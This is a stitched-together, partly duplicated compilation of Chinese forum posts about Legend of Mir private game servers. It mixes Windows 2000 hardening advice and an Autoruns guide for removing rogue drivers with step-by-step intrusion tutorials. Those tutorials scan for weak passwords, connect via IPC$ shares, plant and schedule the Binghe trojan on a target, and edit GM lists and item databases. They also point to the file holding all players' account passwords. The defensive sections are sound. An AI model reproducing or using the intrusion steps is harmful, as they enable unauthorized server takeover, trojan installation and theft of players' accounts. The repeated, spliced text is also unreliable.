7、如果有必要,可以考慮選擇HTTPS,這樣可以防止很多的注入工具掃描,我以前自己開發注入檢測工具的時候,考慮過做支持HTTPS方式的,但目前還沒付諸實施。
相信你也看出來了,總的來說程序方面主要考慮權限、參數過濾等問題;權限主要包括IIS瀏覽權限、數據庫調用權限。除此以外,還要考慮數據庫、操作系統的安全配置。另外,不知道你們在開發過程中會不會用到其他人開發的組件,例如圖片上傳之類的,這類組件你們研究過其安全性么?或者開發的過程中,絕大多數人會使用網上、書上提供的現成代碼,例如用戶登錄驗證等等,這些公開代碼,也要研究其安全性問題。
用Autoruns揪出流氓軟件的驅動保護
[ 2007-03-25 03:07:18 | 作者: sun ]
一、為什么流氓軟件總是刪不掉?
經常有網友發貼子說文件刪除不掉,或者流氓軟件清除不了,或者刪除了相關的文件,但是馬上它又出現了。現在流氓軟件為了保護自己,采取的手段是五花八門,無所不用其極:進程保護,交叉感染,自啟動,自我恢復,文件隱藏,進程注入,驅動保護。
到目前為止,所有流氓軟件最終極、最有效的保護辦法還是底層驅動級的保護,一般就是在drivers目錄下增加一個或多個.sys文件(我也見過一個用rundll32來運行一個.dll作為驅動的),但本質上這個都會在Windows的HKLM\SYSTEM\CurrentControlSet\Services\下建一個相關的值,如CNNIC建立的就是HKLM\SYSTEM\CurrentControlSet\Services\cdnprot,并且將啟動級別做得很高,在安全模式下也會自動啟動。這個底層的驅動過濾所有的文件以及注冊表操作,如果發現是對流氓軟件自己的文件/注冊表操作,就會直接返回一個true,如果發覺文件被刪除,就會通過備份或者網絡來下載恢復。它們的保護措施已經做到這一級,普通用戶根本沒有辦法刪除相關的文件,一般都需要重啟到DOS系統下去刪除文件。
這也是很多網友提的為什么文件刪除不掉,或者刪除了,重啟之后,一會兒又出現了,陰魂不散的原因。下面我們的要做的,就是找出來這些流氓軟件的后臺的驅動保護。
二、為什么找出驅動保護很困難?
Windows的驅動文件一般位于system32\drivers目錄下,以.sys文件方式存在,通過注冊表的HKLM\SYSTEM\CurrentControlSet\Services\的方式來啟動,有一部分屬于服務的,可以在Windows的服務的MMC控制窗口里看到。但如果是驅動,則在這里看不到。Windows正式情況下,那個drivers目錄下有200個左右的文件,如果偷偷往這個下面塞一個.sys文件,是很難發現的。象著名的3721這類cnsminkp.sys,CNNIC的cdnprot.sys比較容易認識,但現在的很多軟件的名字都是不固定的,或者是隨機生成的,這樣的辨識的難度就很大。我曾經用過的方式有:
1、通過保存文件列表,時常自己手工比較這兩個文件,看前后差別多出來的文件肯定有問題
2、通過文件生成的日期。(這點流氓軟件也想到了,日期也只能作為參考)
3、通過文件的屬性里在的公司信息。早年還行,現在越來越多的流氓軟件的驅動冒充是M$的,有的連英文單詞都寫錯了。
4、通過文件夾監視工具。
上面這四種都有一定的缺陷,只能作為參考,都不是太好。并且現在有一些軟件通過文件系統隱藏,這些驅動文件,通過資源管理器,根本連看都看不到。
三、如何找出可疑驅動來?
難道沒有更好的辦法嗎?有,應該有的,這個就是我們今天要介紹的主角:Autoruns
介紹:Autoruns是著名的sysinternals出品的一款小軟件,它的主要功能是列出系統自啟動的項目。通過它,你可以輕易查看到所有系統可能啟動的地方,非常的全面。跟流氓軟件相關的是“Services(服務)",“LSA Providers(LSA提供者)”、"Winsock Providers(Winsock提供者)",“Drivers(驅動)“。下面重點介紹Drivers這一部分的功能。
運行Autoruns之后,在它的“Options(選項)”菜單中有兩項“Verifiy Code Signatures(驗證代碼簽名)“Hide Signed Microsoft Entries(隱藏已簽名的微軟項)“,把這兩項都選中了。驗證代碼簽名是指驗證所有dirvers下的.sys文件的文件簽名。Windows下的硬件有一個簽名的功能,它是為了保證所有的驅動文件是經過M$測試,符合HAL兼容性。隱藏已簽名的微軟項,就是把那些合法的隱藏起來。不然200多個,會看著發暈的。
這樣Autoruns就會檢查所有已經注冊成為驅動的項,并且檢查所有的.sys的文件數字簽名。所有假冒的或者沒有通過代碼簽名的項,都會在這里列出來。也就可以很容易判斷這個驅動是不是有問題了。如果有問題的話,可能通過冰刃把里面相關的注冊表鍵值刪除,重啟機器,這樣驅動保護就失效了,然后可以通過文件刪除工具來刪除其它的文件,完成最后的清理工作。
四、總結
最后再總結一下:
1、流氓軟件刪除不掉或者死灰復燃,很多時候是因為有驅動或服務保護
2、通過Autoruns找到這些可疑的驅動
3、通過冰刃刪除相關驅動健值或者直接用文件粉碎器刪除相關的.sys文件,重啟驅動就無效
4、清理其它文件,完成善后工作。
以上方法通過各種測試是證明有效的,但不排除將來有更進一步的隱藏手段來躲避Autoruns的檢查。但原理是一樣的。不過是通過程序來減少工作量。
經常有網友發貼子說文件刪除不掉,或者流氓軟件清除不了,或者刪除了相關的文件,但是馬上它又出現了。現在流氓軟件為了保護自己,采取的手段是五花八門,無所不用其極:進程保護,交叉感染,自啟動,自我恢復,文件隱藏,進程注入,驅動保護。
到目前為止,所有流氓軟件最終極、最有效的保護辦法還是底層驅動級的保護,一般就是在drivers目錄下增加一個或多個.sys文件(我也見過一個用rundll32來運行一個.dll作為驅動的),但本質上這個都會在Windows的HKLM\SYSTEM\CurrentControlSet\Services\下建一個相關的值,如CNNIC建立的就是HKLM\SYSTEM\CurrentControlSet\Services\cdnprot,并且將啟動級別做得很高,在安全模式下也會自動啟動。這個底層的驅動過濾所有的文件以及注冊表操作,如果發現是對流氓軟件自己的文件/注冊表操作,就會直接返回一個true,如果發覺文件被刪除,就會通過備份或者網絡來下載恢復。它們的保護措施已經做到這一級,普通用戶根本沒有辦法刪除相關的文件,一般都需要重啟到DOS系統下去刪除文件。
這也是很多網友提的為什么文件刪除不掉,或者刪除了,重啟之后,一會兒又出現了,陰魂不散的原因。下面我們的要做的,就是找出來這些流氓軟件的后臺的驅動保護。
二、為什么找出驅動保護很困難?
Windows的驅動文件一般位于system32\drivers目錄下,以.sys文件方式存在,通過注冊表的HKLM\SYSTEM\CurrentControlSet\Services\的方式來啟動,有一部分屬于服務的,可以在Windows的服務的MMC控制窗口里看到。但如果是驅動,則在這里看不到。Windows正式情況下,那個drivers目錄下有200個左右的文件,如果偷偷往這個下面塞一個.sys文件,是很難發現的。象著名的3721這類cnsminkp.sys,CNNIC的cdnprot.sys比較容易認識,但現在的很多軟件的名字都是不固定的,或者是隨機生成的,這樣的辨識的難度就很大。我曾經用過的方式有:
1、通過保存文件列表,時常自己手工比較這兩個文件,看前后差別多出來的文件肯定有問題
2、通過文件生成的日期。(這點流氓軟件也想到了,日期也只能作為參考)
3、通過文件的屬性里在的公司信息。早年還行,現在越來越多的流氓軟件的驅動冒充是M$的,有的連英文單詞都寫錯了。
4、通過文件夾監視工具。
上面這四種都有一定的缺陷,只能作為參考,都不是太好。并且現在有一些軟件通過文件系統隱藏,這些驅動文件,通過資源管理器,根本連看都看不到。
三、如何找出可疑驅動來?
難道沒有更好的辦法嗎?有,應該有的,這個就是我們今天要介紹的主角:Autoruns
介紹:Autoruns是著名的sysinternals出品的一款小軟件,它的主要功能是列出系統自啟動的項目。通過它,你可以輕易查看到所有系統可能啟動的地方,非常的全面。跟流氓軟件相關的是“Services(服務)",“LSA Providers(LSA提供者)”、"Winsock Providers(Winsock提供者)",“Drivers(驅動)“。下面重點介紹Drivers這一部分的功能。
運行Autoruns之后,在它的“Options(選項)”菜單中有兩項“Verifiy Code Signatures(驗證代碼簽名)“Hide Signed Microsoft Entries(隱藏已簽名的微軟項)“,把這兩項都選中了。驗證代碼簽名是指驗證所有dirvers下的.sys文件的文件簽名。Windows下的硬件有一個簽名的功能,它是為了保證所有的驅動文件是經過M$測試,符合HAL兼容性。隱藏已簽名的微軟項,就是把那些合法的隱藏起來。不然200多個,會看著發暈的。
這樣Autoruns就會檢查所有已經注冊成為驅動的項,并且檢查所有的.sys的文件數字簽名。所有假冒的或者沒有通過代碼簽名的項,都會在這里列出來。也就可以很容易判斷這個驅動是不是有問題了。如果有問題的話,可能通過冰刃把里面相關的注冊表鍵值刪除,重啟機器,這樣驅動保護就失效了,然后可以通過文件刪除工具來刪除其它的文件,完成最后的清理工作。
四、總結
最后再總結一下:
1、流氓軟件刪除不掉或者死灰復燃,很多時候是因為有驅動或服務保護
2、通過Autoruns找到這些可疑的驅動
3、通過冰刃刪除相關驅動健值或者直接用文件粉碎器刪除相關的.sys文件,重啟驅動就無效
4、清理其它文件,完成善后工作。
以上方法通過各種測試是證明有效的,但不排除將來有更進一步的隱藏手段來躲避Autoruns的檢查。但原理是一樣的。不過是通過程序來減少工作量。
前幾天,本私服也同樣遭受過黑客的攻擊!但是研究了幾次發現了漏洞的所在!
下面我先寫如何入侵計算機的,我用的是WINDOWS 2000 SEVER
1 X-SCAN掃描IP 看看誰是弱口令(IP也非常容易得到,私服都有,弱口令就是用戶名和密碼都是系統默認的,沒有改。)
2 打開DOS系統 在DOS下進行*作!
c:/>net use \\192.168.0.1\ipc$ /user:administrator 進入對方計算機USER進入的就是管理員用戶。
進入了以后就好辦了,可以找你要黑的私服!做GM也好,搞破壞刪除也好,比如做GM吧!
c:/>copy \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt 都是命令,可以看出來,其余的想怎么改就憑你了,但是我得解釋一下!!這段代碼目的很簡單就是將D盤拷貝一個傳奇GM的列表,你可以把你自己添加進去在編輯!
c:\>edit \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt
這樣就可以了。這是利用弱口令進入計算機的方法!!當然了還有更多的方法。
我在講講我的 ** 傳奇的遭黑的經歷!
首先,就是鼠標亂動,很明顯就是被人控制了,分析如下:1,中木馬,2遠程控制!
其次,有文件覆蓋的對話框,計算機被突然重新啟動!!分析如下:1,破壞系統,2,對傳奇的控制!3,從新啟動是為了黑客的設置生效!
再次,有非法GM制造物品,以被查出。分析如下:是針對傳奇而來!
解決辦法:用殺毒軟件殺毒,最好在DOS下進行!2,是2000的漏洞太多,查找無用的端口,并關閉3389等,下載 2000 SP3 的補丁!在控制面板中選本地用戶和組中關閉GUEST帳號!和 IUSR (計算機名)INTNERNET來賓帳號關閉(我的傳奇就是黑客利用這個號進入計算機的),修改超級管理員用戶名與密碼! 在關閉遠程訪問等功能,另外,進攻傳奇主要是GM列表,我同樣也中過,現象是這樣的,打開AdminList.txt文件,沒有發現多的GM,利用CTRL-A看看有沒有多余的GM,另外仔細一看,在看AdminList.TXT的文件名后面有沒有空格,設置文件全部顯示,會發現是否多了一個隱藏GM列表文件,這也是屢進不止的發現有非法GM的原因.黑客進攻我的計算機是用了2個小時就被我發現了,立即做了相應的修改,恢復了傳奇的正常運行,至今為止,仍然有人進入我的來賓帳號的警告,但是已經進不來了!傳奇也步入了正常的運行當中!
face=Verdana> 雖然我寫了一些如何進攻和防御計算機的方法和解決辦法,我自己也覺得有點自相矛盾的想法,但是我的目的很是簡單,希望能夠幫助你解決你的問題!提高自己計算機的安全
如何在別人的私服做GM?
攻擊初級教學
我在侵入別人4f所使用的方法
看到有些4f做的不錯,但是進去又不是很有錢,也沒裝備,高手也很多,一直不喜歡在里面當菜鳥的我,一口氣進入他們的服務器端大鬧一番之后。當足了gm的癮,現在我把方法公布與大家。。。。
其實我所使用的方法很簡單,只有4個工具:
(一):shed.exe
(二)流光2000
(三)cmd.exe (其實就是2000下的dos啦)!
(四)冰河8.4 操作系統:win2000 server 或者winxp系統。 “shed.exe”:其實就是用來網上查共享資源的,速度快,可以查到很多服務斷的共項文件,不過在這里面有些ip在瀏覽器中無法訪問,這是因為其中也包含了個人上網的ip.呵呵!一些作網站,網吧的服務器一些目錄都是共享的,有些是可以訪問,但是不能刪除,因為你所訪問的都是以匿名訪問的,所以權限不夠!有些需要密碼。遇到密碼怎辦?用流光! “流光”雖說對202作了限制,但是對小日本的ip可是沒有限制的,呵呵!所以說使用流光的ipc探測,建立一個空對話,查到用戶列表,然后先簡單探測,此時有些網管懶惰,把administrator設置的過于簡單,呵呵,你就可以抓到了。
下一步如何做呢?也許在你查對方的端口時發現對方開的端口很少,比如ftp沒開,怎辦呢?冰河! “冰河”,想必許多朋友都玩過,使用冰河控制一臺服務器速度很快,(因為服務器那邊帶寬很大)幾分鐘就可以查到對方主機的主頁所在位置。但是如何上傳并且控制他呢? “cmd.exe” 是2000下的dos了,執行cmd.exe 使用net命令,
具體操作如下:
第一步:net use \\ip\ipc$ “password” /user:”user” 說明:以一個超級用戶名與你想黑的網站建立聯接,當然超級用戶必須是該網站admin里的。這里的”ip”就是主機了,“password”就是超級用戶的密碼,“user”就是超級用戶。比如:net use \\210.248.250.2\ipc$ “maozhiie” /user:maozhijie
第二步:copy g-server.exe \\ip\admin$\system32 說明:g-server.exe就是冰河的遠程服務器端。意義:將此文件拷貝到對方的主機winnt里的system32目錄里。也許有人要問木馬侵入對方那邊可以察覺出來的吧,呵呵!裝了防火墻估計可以,不過很多主機沒錢買呀!不像中國盜版滿天飛!如果你有最新的木馬也可以的!這是最好的了!!嘿嘿……
第三步:net time \\ip 察看對方的服務器時間。由于有時差,應該是一個小時吧!所以必須要以對方的服務器時間為準。
第四步:at \\ip time g-server.exe 這里的time就是對方的主機時間。作用:在規定時間執行該程序。比如 at \\210.248.250.2 19:55 g-server.exe 第五步:冰河就可以控制該電腦了。這個我就不說了吧,呵呵!菜鳥也會玩的軟件。
這時我們就可以控制服務器了,
net use * \\ip\*$ 遠程映射
看這個
mir.db里面有每個人的數據,并且沒加密的,大家可以用
access找開來改一下,改幾個極品,如0-80攻的木劍啊,0-50魔的六角戒指之類的,那就隨你的便了。只是這樣也太煩人了。呵呵。
比如武器,數據格式如下(全部是16進制)
** ** ** ** ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a
前面**的是物品代碼,然后0xce 00 是武器代碼(高位在后),和物品db數據庫中對應,
例:物品數據庫中屠龍是序號(idx)是205,對應到這里就是(205+1)轉為16進制是ce
后面的 43 12是當前持久度,88 13是最大持久度。
例:43 12換算成十進制為17170,持久度為17
后面的01 02 03依次是攻擊、魔法、道術。
注意是在原武基礎上增加。
例:上面的屠龍顯示出來是攻擊:5-36,道術:0-2,魔法:0-3。
后面的04 05 06 07 08 09依次是武器的 幸運、詛咒、準確、攻擊速度、強度。
后面兩個空位后緊跟的0x0a是表示武器是否被修煉,具體來說
給武器加攻擊時:
修煉前:00
修煉后:0a
試驗成功后:00,攻擊值增加。
對于首飾和衣服,自己研究吧,這有好多人都知道的吧,我沒細寫。網上這方面的文章是有的,我就不用多說了吧?
然后到, mirserver\mud2\logsrv\iddb下
這里有個id.db所有人的帳號和密碼都在了,你看著辦吧,不過偷人家的號也不是什么光榮的事,我是從來不做的,只是常常會拿gm的號來reload一下。呵呵
這里,我把你邊走邊看加到這個服務器的adminlist,呵呵,這里是打個比方,這里加入你的名字),然后,我們到mir.db中找出gm的帳號,再到id.db中找出這個帳號的密碼。好了,ok了,用gm號進入游戲(進之前m一下他啊,不要讓人家發現了,也不要改人家的密碼,讓人家發現了多不好啊,呵呵)。打命令@reloadadmin。立刻out吧。
然后,把你加入adminlist的人物從adminlist里刪除,好了,你進去游戲吧,你是gm了,可是真正的gm是不會從服務器端看到你的名字呢!!他也許在想“這里怎么了啊?好像還有個gm???”。呵呵,不過不要過火了,不然人家一個reload你的權限就沒了啊。
到這里大家做gm的夢就完成了,下面我說的就是怎么遠程控制服務器主機了,比如給他關機啊重啟啊····
私服技術我是一點都不懂。不過服務器安全方面還是略懂一二哦!
服務器入侵主要靠的是帳號與密碼。大家要先明白什么是系統帳號。什么是系統密碼!
其它WINDOWS每一個系統都有著他的超級管理員帳號與密碼!
一但這些被黑客掃描到的話,哪么你將會得到一個恐怕的威脅!
當你私服是人氣高的時候。給黑客入侵的話,哪要是萬一給刪了數據。到時候。真的是慘不忍堵。
一:了解一下帳號的含義
先運行CMD
然后輸入:net user(回車健)
這樣后,會顯示一例帳號
再查看管理員帳號
輸入:net localgroup administrators
這就是查看administrators組的用戶。這樣的話若是人家用隱藏帳號的方法也會查出來!
系統自帶的超級管理員帳號是administrator
記住這里顯示出來多個帳號不明的帳號。哪就證明你機器不安全了。若出現在的帳號都是你自已的帳號。哪百分之四十你機器未被入侵
帳號安全:
二:密碼篇
你若覺得自已的帳號密碼是123456哪么不出三秒人家就到你機上一游了。
修改密碼方法,在DOS下修改更安全
輸入net user 帳號名 需修改密碼(然后回車健)
一般密碼設復雜一點!
溢出:
2000服務器版裝下去會自動裝IIS的,若你覺得IIS沒有什么用就停止。IIS地址:開始》》程序》》管理工具》》Internet信息服務(這個就是IIS)你將他開啟。上面按停止!這樣就進一步安全了。不過若IIS你需要用的話,哪么記得打目前最新的補丁SP4哦。
RPC溢出。大家記住,試試telnet IP 135看看有沒有開著。若是開著。請打RPC補丁。若找不到。干脆裝個防火墻,將135端屏蔽!
大家千萬要記住。入侵系統最關點的就是要帳號密碼。保護好自已帳號與密碼。安全一定屬于你!
入侵傳奇私服/充當非法GM
首先,我得聲明,我寫本文并不是教大家如何去黑4f,只是想以本文引起廣大4f擁有者的注意
,提高自己的網管水平。
我愛玩游戲,但卻玩得很菜,也沒有時間去玩,只想玩著過癮,所以,當我開始玩傳奇時,
雖覺得是好玩,但玩盛大的簡直是在受罪,升級慢,沒好裝備,處處受人欺負。所以,4f是明
智的選擇,但進去時也沒有好裝備,也是受人欺負,難道我不可以做gm?試試,folling me!
找來一大堆4f的ip,開個x-scan掃吧。有了,還真不少,都是弱口令的,這些網管真菜呀。
選好一個,192.168.0.1,go!
打開cmd,
1)c:/>net use 192.168.0.1ipc$ /user:administrator
連接成功,
ok,連上了,成功在望,
2)c:/>copy 192.168.0.1d$mirservermir200enviradminlist.txt
系統找不到指定的文件。
沒有?不可能吧?唔,一定是隱藏了,沒關系,再來,
3)c:>attrib -r -h 192.168.0.1d$mirservermir200enviradminlist.txt
沒有提示,成功了,
這次連復制也不用了,直接改吧,
4)c:>edit 192.168.0.1d$mirservermir200enviradminlist.txt
會打開個介面,看看里面有哪些gm,加個吧,自己記得就行了,改完保存退出
5)c:>attrib +r +h 192.168.0.1d$mirservermir200enviradminlist.txt
把adminilist.txt還原成只讀隱藏,
好了,大功告成,快打掃腳印吧,別讓人發現被入侵了,
現在,就等著系統重啟了,等不及的話就在第五步讓它重啟,不過這樣太危險了,還是等吧,
第二天注冊個帳號,新建個之前加的人名進去,
/who
當前150人在線
哈,我就是gm了。趕快把自己升級,
@level -1
升級成功,255級,哈哈
再造出想要的裝備,想要什么盡情造吧,
重復上面的把自己從adminlist.txt里刪了,哈哈,好裝備到手了,可以玩了
面記得有位朋友對加強對服務器安全性的解決方法進行了一系列的說明,講得非常詳細,但是我覺得還有很多需要補充的地方.微軟的系統是漏洞和補丁著稱,真正要對服務器的安全配置確實非常困難,考慮的方面也太多了.
今天先講一個方面的內容了,也算是對前面的朋友的進一步補充吧!
前面那位朋友所概述的主要是針對WIN2000系統弱口令的安全設置!他已經說得很仔細了,做到那些,口令這一關差不多了.確實在互聯網的時代,口令真的非常重要.我對國外的主機進行了一系列的測試,就拿有弱口令的系統來說,還有不少!其中也包括了不少中小型企業的WEB服務器,E-MAIL,PROXY服務器都有這種低級的錯誤!
如果說你在這方面做得非常的仔細.但你至少還要仔細研究一下你主機現在所運行的有哪些服務,這些服務代表著什么?你應該很清楚!因為現在黑客軟件,木馬工具,遠程控制軟件大多是以一種服務的形式運行在你的服務器系統里,一般的防火墻,殺毒軟件對其并沒有任何反映的.對于服務形式出現的控制工具.比較難得發現,所以你就必須在服務器里運行的哪些服務非常熟悉.對于陌生或奇怪的服務應該安全設置好.
下面我都WIN2000的WWW(IIS)服務器安全配置略講一下,WWW服務在WIN2000SERVER,ADSERVER,DATACENTERSERVER,版本中是默認安裝的,如果你不需要用2000的WWW服務的話,建議不要安裝.至于添加/刪除你可以控制面板的去掉他的安裝,或者在管理工具/服務里設置WORD WIDE WEB SERVICE啟動類型為手動/禁用
這樣的話系統就不默認啟動改服務!
如果你需要用IIS來建站宣傳一下自己的私服,你就必須按以下方法安全配置好IIS,
在IIS組件你首先要去掉你不需要的SMTP,SNNP,FTP,這樣的話你可以降低你服務器運行所占用的CPU資源,和內存使用率.然后建議你刪除你C:\INTERPUB\目錄下的所有內容!或者更改路徑.在IIS管理器中刪除默認站點,(或者刪除SCRIPTS這個虛擬目錄)因為這個目錄有可寫的權限的.在新建的WEB站點中,設置IIS的權置,必須讓它不能寫入,或運行.因為IIS是默認支持ASP腳本的.然后在IIS中刪除不需要的映射,這個很重要.如果你要支持PHP,CGI腳本的話,你還得配置好PHP.CGI的應用程序的正確映射,禁用或刪除FSO組件,(去年深圳之窗就是被人家利用FSO黑了......)如果你要使用FSO的話,最好要改名!否則的話,你給別人提供主頁上傳的話,你肯定是會被黑的。小心呀!
目前在黑客橫行的互聯網空間中,利用IIS的漏洞,提申自己的權限,而成為AD,這些只是輕而易舉的事情,這不需要花幾天的時間去暴力破解一下口令,像自己架設的WEB服務器有種情況,更是數不甚數了.關于怎利用UNICODE漏洞去提供AD權限的文章,網上太多了,我就不多講了.
這些來說應該是服務器安全防范方面的一個例子而已,真正要做到服務器的安全運行,需要你花大量的時間去摸索.因為這些來說,足以應付一些無聊的.....當然了,你如果需要WEB服務器,我還是建議你去使用AP了.他的源代碼開發,免費,安全性穩定性都比IIS強得多了.
下面我先寫如何入侵計算機的,我用的是WINDOWS 2000 SEVER
1 X-SCAN掃描IP 看看誰是弱口令(IP也非常容易得到,私服都有,弱口令就是用戶名和密碼都是系統默認的,沒有改。)
2 打開DOS系統 在DOS下進行*作!
c:/>net use \\192.168.0.1\ipc$ /user:administrator 進入對方計算機USER進入的就是管理員用戶。
進入了以后就好辦了,可以找你要黑的私服!做GM也好,搞破壞刪除也好,比如做GM吧!
c:/>copy \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt 都是命令,可以看出來,其余的想怎么改就憑你了,但是我得解釋一下!!這段代碼目的很簡單就是將D盤拷貝一個傳奇GM的列表,你可以把你自己添加進去在編輯!
c:\>edit \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt
這樣就可以了。這是利用弱口令進入計算機的方法!!當然了還有更多的方法。
我在講講我的 ** 傳奇的遭黑的經歷!
首先,就是鼠標亂動,很明顯就是被人控制了,分析如下:1,中木馬,2遠程控制!
其次,有文件覆蓋的對話框,計算機被突然重新啟動!!分析如下:1,破壞系統,2,對傳奇的控制!3,從新啟動是為了黑客的設置生效!
再次,有非法GM制造物品,以被查出。分析如下:是針對傳奇而來!
解決辦法:用殺毒軟件殺毒,最好在DOS下進行!2,是2000的漏洞太多,查找無用的端口,并關閉3389等,下載 2000 SP3 的補丁!在控制面板中選本地用戶和組中關閉GUEST帳號!和 IUSR (計算機名)INTNERNET來賓帳號關閉(我的傳奇就是黑客利用這個號進入計算機的),修改超級管理員用戶名與密碼! 在關閉遠程訪問等功能,另外,進攻傳奇主要是GM列表,我同樣也中過,現象是這樣的,打開AdminList.txt文件,沒有發現多的GM,利用CTRL-A看看有沒有多余的GM,另外仔細一看,在看AdminList.TXT的文件名后面有沒有空格,設置文件全部顯示,會發現是否多了一個隱藏GM列表文件,這也是屢進不止的發現有非法GM的原因.黑客進攻我的計算機是用了2個小時就被我發現了,立即做了相應的修改,恢復了傳奇的正常運行,至今為止,仍然有人進入我的來賓帳號的警告,但是已經進不來了!傳奇也步入了正常的運行當中!
face=Verdana> 雖然我寫了一些如何進攻和防御計算機的方法和解決辦法,我自己也覺得有點自相矛盾的想法,但是我的目的很是簡單,希望能夠幫助你解決你的問題!提高自己計算機的安全
如何在別人的私服做GM?
攻擊初級教學
我在侵入別人4f所使用的方法
看到有些4f做的不錯,但是進去又不是很有錢,也沒裝備,高手也很多,一直不喜歡在里面當菜鳥的我,一口氣進入他們的服務器端大鬧一番之后。當足了gm的癮,現在我把方法公布與大家。。。。
其實我所使用的方法很簡單,只有4個工具:
(一):shed.exe
(二)流光2000
(三)cmd.exe (其實就是2000下的dos啦)!
(四)冰河8.4 操作系統:win2000 server 或者winxp系統。 “shed.exe”:其實就是用來網上查共享資源的,速度快,可以查到很多服務斷的共項文件,不過在這里面有些ip在瀏覽器中無法訪問,這是因為其中也包含了個人上網的ip.呵呵!一些作網站,網吧的服務器一些目錄都是共享的,有些是可以訪問,但是不能刪除,因為你所訪問的都是以匿名訪問的,所以權限不夠!有些需要密碼。遇到密碼怎辦?用流光! “流光”雖說對202作了限制,但是對小日本的ip可是沒有限制的,呵呵!所以說使用流光的ipc探測,建立一個空對話,查到用戶列表,然后先簡單探測,此時有些網管懶惰,把administrator設置的過于簡單,呵呵,你就可以抓到了。
下一步如何做呢?也許在你查對方的端口時發現對方開的端口很少,比如ftp沒開,怎辦呢?冰河! “冰河”,想必許多朋友都玩過,使用冰河控制一臺服務器速度很快,(因為服務器那邊帶寬很大)幾分鐘就可以查到對方主機的主頁所在位置。但是如何上傳并且控制他呢? “cmd.exe” 是2000下的dos了,執行cmd.exe 使用net命令,
具體操作如下:
第一步:net use \\ip\ipc$ “password” /user:”user” 說明:以一個超級用戶名與你想黑的網站建立聯接,當然超級用戶必須是該網站admin里的。這里的”ip”就是主機了,“password”就是超級用戶的密碼,“user”就是超級用戶。比如:net use \\210.248.250.2\ipc$ “maozhiie” /user:maozhijie
第二步:copy g-server.exe \\ip\admin$\system32 說明:g-server.exe就是冰河的遠程服務器端。意義:將此文件拷貝到對方的主機winnt里的system32目錄里。也許有人要問木馬侵入對方那邊可以察覺出來的吧,呵呵!裝了防火墻估計可以,不過很多主機沒錢買呀!不像中國盜版滿天飛!如果你有最新的木馬也可以的!這是最好的了!!嘿嘿……
第三步:net time \\ip 察看對方的服務器時間。由于有時差,應該是一個小時吧!所以必須要以對方的服務器時間為準。
第四步:at \\ip time g-server.exe 這里的time就是對方的主機時間。作用:在規定時間執行該程序。比如 at \\210.248.250.2 19:55 g-server.exe 第五步:冰河就可以控制該電腦了。這個我就不說了吧,呵呵!菜鳥也會玩的軟件。
這時我們就可以控制服務器了,
net use * \\ip\*$ 遠程映射
看這個
mir.db里面有每個人的數據,并且沒加密的,大家可以用
access找開來改一下,改幾個極品,如0-80攻的木劍啊,0-50魔的六角戒指之類的,那就隨你的便了。只是這樣也太煩人了。呵呵。
比如武器,數據格式如下(全部是16進制)
** ** ** ** ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a
前面**的是物品代碼,然后0xce 00 是武器代碼(高位在后),和物品db數據庫中對應,
例:物品數據庫中屠龍是序號(idx)是205,對應到這里就是(205+1)轉為16進制是ce
后面的 43 12是當前持久度,88 13是最大持久度。
例:43 12換算成十進制為17170,持久度為17
后面的01 02 03依次是攻擊、魔法、道術。
注意是在原武基礎上增加。
例:上面的屠龍顯示出來是攻擊:5-36,道術:0-2,魔法:0-3。
后面的04 05 06 07 08 09依次是武器的 幸運、詛咒、準確、攻擊速度、強度。
后面兩個空位后緊跟的0x0a是表示武器是否被修煉,具體來說
給武器加攻擊時:
修煉前:00
修煉后:0a
試驗成功后:00,攻擊值增加。
對于首飾和衣服,自己研究吧,這有好多人都知道的吧,我沒細寫。網上這方面的文章是有的,我就不用多說了吧?
然后到, mirserver\mud2\logsrv\iddb下
這里有個id.db所有人的帳號和密碼都在了,你看著辦吧,不過偷人家的號也不是什么光榮的事,我是從來不做的,只是常常會拿gm的號來reload一下。呵呵
這里,我把你邊走邊看加到這個服務器的adminlist,呵呵,這里是打個比方,這里加入你的名字),然后,我們到mir.db中找出gm的帳號,再到id.db中找出這個帳號的密碼。好了,ok了,用gm號進入游戲(進之前m一下他啊,不要讓人家發現了,也不要改人家的密碼,讓人家發現了多不好啊,呵呵)。打命令@reloadadmin。立刻out吧。
然后,把你加入adminlist的人物從adminlist里刪除,好了,你進去游戲吧,你是gm了,可是真正的gm是不會從服務器端看到你的名字呢!!他也許在想“這里怎么了啊?好像還有個gm???”。呵呵,不過不要過火了,不然人家一個reload你的權限就沒了啊。
到這里大家做gm的夢就完成了,下面我說的就是怎么遠程控制服務器主機了,比如給他關機啊重啟啊····
私服技術我是一點都不懂。不過服務器安全方面還是略懂一二哦!
服務器入侵主要靠的是帳號與密碼。大家要先明白什么是系統帳號。什么是系統密碼!
其它WINDOWS每一個系統都有著他的超級管理員帳號與密碼!
一但這些被黑客掃描到的話,哪么你將會得到一個恐怕的威脅!
當你私服是人氣高的時候。給黑客入侵的話,哪要是萬一給刪了數據。到時候。真的是慘不忍堵。
一:了解一下帳號的含義
先運行CMD
然后輸入:net user(回車健)
這樣后,會顯示一例帳號
再查看管理員帳號
輸入:net localgroup administrators
這就是查看administrators組的用戶。這樣的話若是人家用隱藏帳號的方法也會查出來!
系統自帶的超級管理員帳號是administrator
記住這里顯示出來多個帳號不明的帳號。哪就證明你機器不安全了。若出現在的帳號都是你自已的帳號。哪百分之四十你機器未被入侵
帳號安全:
二:密碼篇
你若覺得自已的帳號密碼是123456哪么不出三秒人家就到你機上一游了。
修改密碼方法,在DOS下修改更安全
輸入net user 帳號名 需修改密碼(然后回車健)
一般密碼設復雜一點!
溢出:
2000服務器版裝下去會自動裝IIS的,若你覺得IIS沒有什么用就停止。IIS地址:開始》》程序》》管理工具》》Internet信息服務(這個就是IIS)你將他開啟。上面按停止!這樣就進一步安全了。不過若IIS你需要用的話,哪么記得打目前最新的補丁SP4哦。
RPC溢出。大家記住,試試telnet IP 135看看有沒有開著。若是開著。請打RPC補丁。若找不到。干脆裝個防火墻,將135端屏蔽!
大家千萬要記住。入侵系統最關點的就是要帳號密碼。保護好自已帳號與密碼。安全一定屬于你!
入侵傳奇私服/充當非法GM
首先,我得聲明,我寫本文并不是教大家如何去黑4f,只是想以本文引起廣大4f擁有者的注意
,提高自己的網管水平。
我愛玩游戲,但卻玩得很菜,也沒有時間去玩,只想玩著過癮,所以,當我開始玩傳奇時,
